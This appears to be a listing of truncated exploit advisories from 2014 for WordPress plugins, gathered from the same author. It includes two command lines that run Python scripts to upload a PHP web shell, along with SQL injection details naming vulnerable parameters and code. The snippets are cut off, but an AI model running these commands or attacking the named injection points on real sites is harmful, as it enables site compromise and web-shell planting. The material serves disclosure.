claudio@backbox3:~$ python wp_j00m_creative_contact_form_shell_upload.py -t http://127.0.0.1/wordpress -f shell.php -c wordpress
___ ___ __ __,-,__ | Y .-----.----.--| .-----.----.-----.-----. | ' '__| |. | | _ | _| _ | _ | _| -__|__ --| | __| |. / \ |_____|__| |_____| __|__| |_____|_____| |_______| |: | _______ |__| __ |_| |::.|:. | | _ .-----.-----.--------| .---.-. `--- ---' |___| | _ | _ | | | _ | |. | |_____|_____|__|__|__|__|___._| |: 1 | |::....
######################
# Exploit Title : WordPress CP Multi View Event Calendar 1.01 SQL Injection Vulnerability
# Exploit Author : Claudio Viviani # Software Link : https://downloads.wordpress.org/plugin/cp-multi-view-calendar.zip
# Date : 2014-10-23
# Tested on : Windows 7 / Mozilla Firefox
Windows 7 / sqlmap (0.8-1)
Linux / Mozilla Firefox
Linux / sqlmap 1.0-dev-5b2ded0
######################
# Description
CP Multi View Event Calendar 1.01 suffers from SQL injection vulnerability
calid variable is not sanitized....
[claudio@localhost ~]$ python wp_gallery_slideshow_146_suv.py -t http://localhost/wordpress -u editor -p editor -f sh33l.php
$$$$$$\ $$\ $$\ $$\ $$\
$$ __$$\ $$ |\__| $$ | $$ |
$$ / \__|$$ |$$\ $$$$$$$ | $$$$$$\ $$$$$$$\ $$$$$$$\ $$$$$$\ $$\ $$\ $$\
\$$$$$$\ $$ |$$ |$$ __$$ |$$ __$$\ $$ _____|$$ __$$\ $$ __$$\ $$ | $$ | $$ |
\____$$\ $$ |$$ |$$ / $$ |$$$$$$$$ |\$$$$$$\ $$ | $$ |$$ / $$ |$$ | $$ | $$ |
$$\ $$ |$$ |$$ |$$ | $$ |$$ ____| \____$$\ $$ | $$ |$$ | $$ |$$ | $$ | $$ |
\$$$$$$ |$$ |$$ |\$$$$$$$ |\$$$$$$$\ $$$$$$$ |$$ | $$ |\$$$$$$ |\$$$$$\$$$$ |
\______/ \__|\__| \_______| \_______|\_______/ \__| \__| \______/ \_____\____/
$$$$$$\ $$\ $$\ $$\ $$\ $$\ $$$$$$\
$$ __$$\ $$ |$$ | $$$$ |$$ | $$ | $$ __$$\
$$ / \__| $$$$$$\ $$ |$$ | $$$$$$\ $$$$$$\ $$\ $$\ \_$$ |$$ | $$ | $$ / \__|
$$ |$$$$\ \____$$\ $$ |$$ |$$ __$$\ $$ __$$\ $$ | $$ | $$ |$$$$$$$$ | $$$$$$$\
$$ |\_$$ | $$$$$$$ |$$ |$$ |$$$$$$$$ |$$ | \__|$$ | $$ | $$ |\_____$$ | $$ __$$\
$$ | $$ |$$ __$$ |$$ |$$ |$$ ____|$$ | $$ | $$ | $$ | $$ | $$ / $$ |
\$$$$$$ |\$$$$$$$ |$$ |$$ |\$$$$$$$\ $$ | \$$$$$$$ | $$$$$$\ $$\ $$ |$$\ $$$$$$ |
\______/ \_______|\__|\__| \_______|\__| \____$$ | \______|\__|\__|\__|\______/
$$\ $$ |
\$$$$$$ |
\______/
W0rdpr3ss Sl1d3sh04w G4ll3ry 1....
######################
# Exploit Title : WordPress Spider Facebook 1.0.8 Authenticated SQL Injection
# Exploit Author : Claudio Viviani
# Vendor Homepage : http://web-dorado.com/
# Software Link : http://downloads.wordpress.org/plugin/spider-facebook.1.0.8.zip
# Date : 2014-08-25
# Tested on : Windows 7 / Mozilla Firefox
# Linux / Mozilla Firefox
# Linux / sqlmap 1.0-dev-5b2ded0
######################
# Location : http://localhost/wp-content/plugins/plugins/spider-facebook/facebook.php
######################
# Vulnerable code :
function Spider_Facebook_manage()
{
require_once("facebook_manager.php");
require_once("facbook_manager.html.php");
if(!function_exists ('print_html_nav' ))
require_once("nav_function/nav_html_func....
######################
# Exploit Title : WordPress Huge-IT Image Gallery 1.0.1 Authenticated SQL Injection
# Exploit Author : Claudio Viviani
# Vendor Homepage : http://huge-it.com/
# Software Link : http://downloads.wordpress.org/plugin/gallery-images.zip (Fixed)
Mirror Link : https://mega.co.nz/#!3EoUzSQI!yrl75XQsp1ggxDCjW-wq7yUxLdbLu0WHPNFcJAxJOHs
# Date : 2014-08-25
# Tested on : Windows 7 / Mozilla Firefox
# Linux / Mozilla Firefox
# Linux / sqlmap 1.0-dev-5b2ded0
######################
# Location : http://localhost/wp-content/plugins/gallery-images/admin/gallery_func.php
######################
# Vulnerable code :
function editgallery($id)
{
global $wpdb;
if(isset($_GET["removeslide"])){
if($_GET["removeslide"] !...